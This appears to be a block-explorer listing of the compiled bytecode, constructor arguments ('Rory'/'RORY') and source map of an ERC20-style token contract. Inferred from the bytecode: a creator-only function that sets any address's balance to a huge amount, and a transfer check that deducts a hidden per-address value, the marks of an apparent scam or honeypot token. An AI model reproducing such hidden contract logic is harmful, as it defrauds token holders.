ffffffffffffffffffffffffffff1614156109b2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109a9906115ee565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a9091906116ee565b60405180910390a3505050565b6000610aa98484610761565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b335781811015610b15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0c9061162e565b60405180910390fd5b610b328484610b2d8585610f8f90919063ffffffff16565b6108d2565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ba9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ba09061168e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c10906115ae565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610cb182600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8f90919063ffffffff16565b905082811015610cf6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ced9061164e565b60405180910390fd5b610d098382610f8f90919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610d9e83600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461086c90919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610e3e91906116ee565b60405180910390a35050505050565b610e556108ca565b73ffffffffffffffffffffffffffffffffffffffff16610e73610535565b73ffffffffffffffffffffffffffffffffffffffff1614610ec9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec09061166e565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000610fd183836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610fd9565b905092915050565b6000838311158290611021576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611018919061158c565b60405180910390fd5b50600083856110309190611796565b9050809150509392505050565b60008135905061104c816118f3565b92915050565b6000813590506110618161190a565b92915050565b60006020828403121561107957600080fd5b60006110878482850161103d565b91505092915050565b600080604083850312156110a357600080fd5b60006110b18582860161103d565b92505060206110c28582860161103d565b9150509250929050565b6000806000606084860312156110e157600080fd5b60006110ef8682870161103d565b93505060206111008682870161103d565b925050604061111186828701611052565b9150509250925092565b6000806040838503121561112e57600080fd5b600061113c8582860161103d565b925050602061114d85828601611052565b9150509250929050565b611160816117ca565b82525050565b61116f816117dc565b82525050565b600061118082611724565b61118a818561172f565b935061119a81856020860161181f565b6111a3816118e2565b840191505092915050565b60006111bb60238361172f565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061122160268361172f565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061128760228361172f565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006112ed601b8361172f565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b600061132d601d8361172f565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b600061136d60268361172f565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006113d360208361172f565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b600061141360258361172f565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061147960248361172f565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114df60258361172f565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61154181611808565b82525050565b61155081611812565b82525050565b600060208201905061156b6000830184611157565b92915050565b60006020820190506115866000830184611166565b92915050565b600060208201905081810360008301526115a68184611175565b905092915050565b600060208201905081810360008301526115c7816111ae565b9050919050565b600060208201905081810360008301526115e781611214565b9050919050565b600060208201905081810360008301526116078161127a565b9050919050565b60006020820190508181036000830152611627816112e0565b9050919050565b6000602082019050818103600083015261164781611320565b9050919050565b6000602082019050818103600083015261166781611360565b9050919050565b60006020820190508181036000830152611687816113c6565b9050919050565b600060208201905081810360008301526116a781611406565b9050919050565b600060208201905081810360008301526116c78161146c565b9050919050565b600060208201905081810360008301526116e7816114d2565b9050919050565b60006020820190506117036000830184611538565b92915050565b600060208201905061171e6000830184611547565b92915050565b600081519050919050565b600082825260208201905092915050565b600061174b82611808565b915061175683611808565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561178b5761178a611884565b5b828201905092915050565b60006117a182611808565b91506117ac83611808565b9250828210156117bf576117be611884565b5b828203905092915050565b60006117d5826117e8565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561183d578082015181840152602081019050611822565b8381111561184c576000848401525b50505050565b6000600282049050600182168061186a57607f821691505b6020821081141561187e5761187d6118b3565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b6118fc816117ca565b811461190757600080fd5b50565b61191381611808565b811461191e57600080fd5b5056fea2646970667358221220c7ddebf7fdcfc2ac2a0622bc51ef34648742ee5f597e5fd76762cb55eb6e726964736f6c63430008000033000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000004526f7279000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004524f525900000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a2578063963f0efa11610071578063963f0efa146102ac578063a457c2d7146102c8578063a9059cbb146102f8578063dd62ed3e14610328578063f2fde38b146103585761010b565b806370a0823114610236578063715018a6146102665780638da5cb5b1461027057806395d89b411461028e5761010b565b806323b872dd116100de57806323b872dd1461019a578063313ce567146101ca57806339509351146101e85780634b6406d1146102185761010b565b806302d05d3f1461011057806306fdde031461012e578063095ea7b31461014c57806318160ddd1461017c575b600080fd5b610118610374565b6040516101259190611556565b60405180910390f35b61013661039a565b604051610143919061158c565b60405180910390f35b6101666004803603810190610161919061111b565b61042c565b6040516101739190611571565b60405180910390f35b61018461044f565b60405161019191906116ee565b60405180910390f35b6101b460048036038101906101af91906110cc565b610459565b6040516101c19190611571565b60405180910390f35b6101d2610488565b6040516101df9190611709565b60405180910390f35b61020260048036038101906101fd919061111b565b610491565b60405161020f9190611571565b60405180910390f35b6102206104c8565b60405161022d91906116ee565b60405180910390f35b610250600480360381019061024b9190611067565b6104d8565b60405161025d91906116ee565b60405180910390f35b61026e610521565b005b610278610535565b6040516102859190611556565b60405180910390f35b61029661055e565b6040516102a3919061158c565b60405180910390f35b6102c660048036038101906102c19190611067565b6105f0565b005b6102e260048036038101906102dd919061111b565b6106b7565b6040516102ef9190611571565b60405180910390f35b610312600480360381019061030d919061111b565b61073e565b60405161031f9190611571565b60405180910390f35b610342600480360381019061033d9190611090565b610761565b60405161034f91906116ee565b60405180910390f35b610372600480360381019061036d9190611067565b6107e8565b005b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6060600580546103a990611852565b80601f01602080910402602001604051908101604052809291908181526020018280546103d590611852565b80156104225780601f106103f757610100808354040283529160200191610422565b820191906000526020600020905b81548152906001019060200180831161040557829003601f168201915b5050505050905090565b6000806104376108ca565b90506104448185856108d2565b600191505092915050565b6000600454905090565b6000806104646108ca565b9050610471858285610a9d565b61047c858585610b39565b60019150509392505050565b60006012905090565b60008061049c6108ca565b90506104bd8185856104ae8589610761565b6104b89190611740565b6108d2565b600191505092915050565b6b033b2e3c9fd0803ce800000081565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610529610e4d565b6105336000610ecb565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461056d90611852565b80601f016020809104026020016040519081016040528092919081815260200182805461059990611852565b80156105e65780601f106105bb576101008083540402835291602001916105e6565b820191906000526020600020905b8154815290600101906020018083116105c957829003601f168201915b5050505050905090565b60008060006105fd6108ca565b90506000808273ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156106af57710125dfa371a19e6f7cb54395ca0000000000600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050505050565b6000806106c26108ca565b905060006106d08286610761565b905083811015610715576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070c906116ce565b60405180910390fd5b610732828661072d8785610f8f90919063ffffffff16565b6108d2565b60019250505092915050565b6000806107496108ca565b9050610756818585610b39565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107f0610e4d565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610860576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610857906115ce565b60405180910390fd5b61086981610ecb565b50565b600080828461087b9190611740565b9050838110156108c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b79061160e565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610942576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610939906116ae565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156109b2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109a9906115ee565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a9091906116ee565b60405180910390a3505050565b6000610aa98484610761565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b335781811015610b15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0c9061162e565b60405180910390fd5b610b328484610b2d8585610f8f90919063ffffffff16565b6108d2565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ba9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ba09061168e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c10906115ae565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610cb182600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8f90919063ffffffff16565b905082811015610cf6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ced9061164e565b60405180910390fd5b610d098382610f8f90919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610d9e83600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461086c90919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610e3e91906116ee565b60405180910390a35050505050565b610e556108ca565b73ffffffffffffffffffffffffffffffffffffffff16610e73610535565b73ffffffffffffffffffffffffffffffffffffffff1614610ec9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec09061166e565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000610fd183836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610fd9565b905092915050565b6000838311158290611021576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611018919061158c565b60405180910390fd5b50600083856110309190611796565b9050809150509392505050565b60008135905061104c816118f3565b92915050565b6000813590506110618161190a565b92915050565b60006020828403121561107957600080fd5b60006110878482850161103d565b91505092915050565b600080604083850312156110a357600080fd5b60006110b18582860161103d565b92505060206110c28582860161103d565b9150509250929050565b6000806000606084860312156110e157600080fd5b60006110ef8682870161103d565b93505060206111008682870161103d565b925050604061111186828701611052565b9150509250925092565b6000806040838503121561112e57600080fd5b600061113c8582860161103d565b925050602061114d85828601611052565b9150509250929050565b611160816117ca565b82525050565b61116f816117dc565b82525050565b600061118082611724565b61118a818561172f565b935061119a81856020860161181f565b6111a3816118e2565b840191505092915050565b60006111bb60238361172f565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061122160268361172f565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061128760228361172f565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006112ed601b8361172f565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b600061132d601d8361172f565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b600061136d60268361172f565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006113d360208361172f565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b600061141360258361172f565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061147960248361172f565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114df60258361172f565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61154181611808565b82525050565b61155081611812565b82525050565b600060208201905061156b6000830184611157565b92915050565b60006020820190506115866000830184611166565b92915050565b600060208201905081810360008301526115a68184611175565b905092915050565b600060208201905081810360008301526115c7816111ae565b9050919050565b600060208201905081810360008301526115e781611214565b9050919050565b600060208201905081810360008301526116078161127a565b9050919050565b60006020820190508181036000830152611627816112e0565b9050919050565b6000602082019050818103600083015261164781611320565b9050919050565b6000602082019050818103600083015261166781611360565b9050919050565b60006020820190508181036000830152611687816113c6565b9050919050565b600060208201905081810360008301526116a781611406565b9050919050565b600060208201905081810360008301526116c78161146c565b9050919050565b600060208201905081810360008301526116e7816114d2565b9050919050565b60006020820190506117036000830184611538565b92915050565b600060208201905061171e6000830184611547565b92915050565b600081519050919050565b600082825260208201905092915050565b600061174b82611808565b915061175683611808565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561178b5761178a611884565b5b828201905092915050565b60006117a182611808565b91506117ac83611808565b9250828210156117bf576117be611884565b5b828203905092915050565b60006117d5826117e8565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561183d578082015181840152602081019050611822565b8381111561184c576000848401525b50505050565b6000600282049050600182168061186a57607f821691505b6020821081141561187e5761187d6118b3565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b6118fc816117ca565b811461190757600080fd5b50565b61191381611808565b811461191e57600080fd5b5056fea2646970667358221220c7ddebf7fdcfc2ac2a0622bc51ef34648742ee5f597e5fd76762cb55eb6e726964736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000004526f7279000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004524f525900000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Rory
Arg [1] : symbol_ (string): RORY

-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [3] : 526f727900000000000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [5] : 524f525900000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

11270:10304:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11434:22;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12051:90;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14136:177;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13064:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14827:230;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12930:83;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15416:214;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11542:57;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13211:116;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9208:93;;;:::i;:::-;;8620:77;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12242:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16901:364;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;16075:363;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13499:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13717:141;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9438:184;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11434:22;;;;;;;;;;;;;:::o;12051:90::-;12105:13;12131:5;12124:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12051:90;:::o;14136:177::-;14219:4;14229:13;14245:12;:10;:12::i;:::-;14229:28;;14261:32;14270:5;14277:7;14286:6;14261:8;:32::i;:::-;14304:4;14297:11;;;14136:177;;;;:::o;13064:98::-;13125:7;13145:12;;13138:19;;13064:98;:::o;14827:230::-;14924:4;14934:15;14952:12;:10;:12::i;:::-;14934:30;;14968:38;14984:4;14990:7;14999:6;14968:15;:38::i;:::-;15010:27;15020:4;15026:2;15030:6;15010:9;:27::i;:::-;15048:4;15041:11;;;14827:230;;;;;:::o;12930:83::-;12988:5;13006:2;12999:9;;12930:83;:::o;15416:214::-;15504:4;15514:13;15530:12;:10;:12::i;:::-;15514:28;;15546:64;15555:5;15562:7;15599:10;15571:25;15581:5;15588:7;15571:9;:25::i;:::-;:38;;;;:::i;:::-;15546:8;:64::i;:::-;15621:4;15614:11;;;15416:214;;;;:::o;11542:57::-;11578:21;11542:57;:::o;13211:116::-;13285:7;13305:8;:17;13314:7;13305:17;;;;;;;;;;;;;;;;13298:24;;13211:116;;;:::o;9208:93::-;8526:17;:15;:17::i;:::-;9266:30:::1;9293:1;9266:18;:30::i;:::-;9208:93::o:0;8620:77::-;8666:7;8686:6;;;;;;;;;;;8679:13;;8620:77;:::o;12242:94::-;12298:13;12324:7;12317:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12242:94;:::o;16901:364::-;16956:14;16978;17001:18;17022:12;:10;:12::i;:::-;17001:33;;17041:15;17063;17100:10;17089:21;;:7;;;;;;;;;;;:21;;;17085:146;;;17141:41;17123:8;:15;17132:5;17123:15;;;;;;;;;;;;;;;:59;;;;17085:146;16901:364;;;;;;:::o;16075:363::-;16168:4;16178:13;16194:12;:10;:12::i;:::-;16178:28;;16210:24;16237:25;16247:5;16254:7;16237:9;:25::i;:::-;16210:52;;16294:15;16274:16;:35;;16266:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;16355:63;16364:5;16371:7;16380:37;16401:15;16380:16;:20;;:37;;;;:::i;:::-;16355:8;:63::i;:::-;16429:4;16422:11;;;;16075:363;;;;:::o;13499:169::-;13578:4;13588:13;13604:12;:10;:12::i;:::-;13588:28;;13620;13630:5;13637:2;13641:6;13620:9;:28::i;:::-;13659:4;13652:11;;;13499:169;;;;:::o;13717:141::-;13806:7;13826:11;:18;13838:5;13826:18;;;;;;;;;;;;;;;:27;13845:7;13826:27;;;;;;;;;;;;;;;;13819:34;;13717:141;;;;:::o;9438:184::-;8526:17;:15;:17::i;:::-;9540:1:::1;9520:22;;:8;:22;;;;9512:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;9589:28;9608:8;9589:18;:28::i;:::-;9438:184:::0;:::o;3455:157::-;3513:7;3526:9;3542:1;3538;:5;;;;:::i;:::-;3526:17;;3560:1;3555;:6;;3547:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;3606:1;3599:8;;;3455:157;;;;:::o;7930:88::-;7983:7;8003:10;7996:17;;7930:88;:::o;19392:315::-;19504:1;19487:19;;:5;:19;;;;19479:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19578:1;19559:21;;:7;:21;;;;19551:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19655:6;19625:11;:18;19637:5;19625:18;;;;;;;;;;;;;;;:27;19644:7;19625:27;;;;;;;;;;;;;;;:36;;;;19686:7;19670:32;;19679:5;19670:32;;;19695:6;19670:32;;;;;;:::i;:::-;;;;;;;;19392:315;;;:::o;19964:332::-;20058:24;20085:25;20095:5;20102:7;20085:9;:25::i;:::-;20058:52;;20138:17;20118:16;:37;20114:178;;20189:6;20169:16;:26;;20161:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;20233:54;20242:5;20249:7;20258:28;20279:6;20258:16;:20;;:28;;;;:::i;:::-;20233:8;:54::i;:::-;20114:178;19964:332;;;;:::o;17270:556::-;17376:1;17360:18;;:4;:18;;;;17352:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17446:1;17432:16;;:2;:16;;;;17424:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;17494:17;17514:5;:11;17520:4;17514:11;;;;;;;;;;;;;;;;17494:31;;17529:21;17553:29;17572:9;17553:8;:14;17562:4;17553:14;;;;;;;;;;;;;;;;:18;;:29;;;;:::i;:::-;17529:53;;17611:6;17594:13;:23;;17586:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;17681:25;17699:6;17681:13;:17;;:25;;;;:::i;:::-;17664:8;:14;17673:4;17664:14;;;;;;;;;;;;;;;:42;;;;17762:24;17779:6;17762:8;:12;17771:2;17762:12;;;;;;;;;;;;;;;;:16;;:24;;;;:::i;:::-;17747:8;:12;17756:2;17747:12;;;;;;;;;;;;;;;:39;;;;17810:2;17795:26;;17804:4;17795:26;;;17814:6;17795:26;;;;;;:::i;:::-;;;;;;;;17270:556;;;;;:::o;8761:126::-;8833:12;:10;:12::i;:::-;8822:23;;:7;:5;:7::i;:::-;:23;;;8814:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8761:126::o;9764:167::-;9831:16;9850:6;;;;;;;;;;;9831:25;;9869:8;9860:6;;:17;;;;;;;;;;;;;;;;;;9917:8;9886:40;;9907:8;9886:40;;;;;;;;;;;;9764:167;;:::o;3853:126::-;3911:7;3931:43;3935:1;3938;3931:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;3924:50;;3853:126;;;;:::o;4240:168::-;4326:7;4352:1;4347;:6;;4355:12;4339:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;4372:9;4388:1;4384;:5;;;;:::i;:::-;4372:17;;4402:1;4395:8;;;4240:168;;;;;:::o;7:139:1:-;;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:262::-;;405:2;393:9;384:7;380:23;376:32;373:2;;;421:1;418;411:12;373:2;464:1;489:53;534:7;525:6;514:9;510:22;489:53;:::i;:::-;479:63;;435:117;363:196;;;;:::o;565:407::-;;;690:2;678:9;669:7;665:23;661:32;658:2;;;706:1;703;696:12;658:2;749:1;774:53;819:7;810:6;799:9;795:22;774:53;:::i;:::-;764:63;;720:117;876:2;902:53;947:7;938:6;927:9;923:22;902:53;:::i;:::-;892:63;;847:118;648:324;;;;;:::o;978:552::-;;;;1120:2;1108:9;1099:7;1095:23;1091:32;1088:2;;;1136:1;1133;1126:12;1088:2;1179:1;1204:53;1249:7;1240:6;1229:9;1225:22;1204:53;:::i;:::-;1194:63;;1150:117;1306:2;1332:53;1377:7;1368:6;1357:9;1353:22;1332:53;:::i;:::-;1322:63;;1277:118;1434:2;1460:53;1505:7;1496:6;1485:9;1481:22;1460:53;:::i;:::-;1450:63;;1405:118;1078:452;;;;;:::o;1536:407::-;;;1661:2;1649:9;1640:7;1636:23;1632:32;1629:2;;;1677:1;1674;1667:12;1629:2;1720:1;1745:53;1790:7;1781:6;1770:9;1766:22;1745:53;:::i;:::-;1735:63;;1691:117;1847:2;1873:53;1918:7;1909:6;1898:9;1894:22;1873:53;:::i;:::-;1863:63;;1818:118;1619:324;;;;;:::o;1949:118::-;2036:24;2054:5;2036:24;:::i;:::-;2031:3;2024:37;2014:53;;:::o;2073:109::-;2154:21;2169:5;2154:21;:::i;:::-;2149:3;2142:34;2132:50;;:::o;2188:364::-;;2304:39;2337:5;2304:39;:::i;:::-;2359:71;2423:6;2418:3;2359:71;:::i;:::-;2352:78;;2439:52;2484:6;2479:3;2472:4;2465:5;2461:16;2439:52;:::i;:::-;2516:29;2538:6;2516:29;:::i;:::-;2511:3;2507:39;2500:46;;2280:272;;;;;:::o;2558:367::-;;2721:67;2785:2;2780:3;2721:67;:::i;:::-;2714:74;;2818:34;2814:1;2809:3;2805:11;2798:55;2884:5;2879:2;2874:3;2870:12;2863:27;2916:2;2911:3;2907:12;2900:19;;2704:221;;;:::o;2931:370::-;;3094:67;3158:2;3153:3;3094:67;:::i;:::-;3087:74;;3191:34;3187:1;3182:3;3178:11;3171:55;3257:8;3252:2;3247:3;3243:12;3236:30;3292:2;3287:3;3283:12;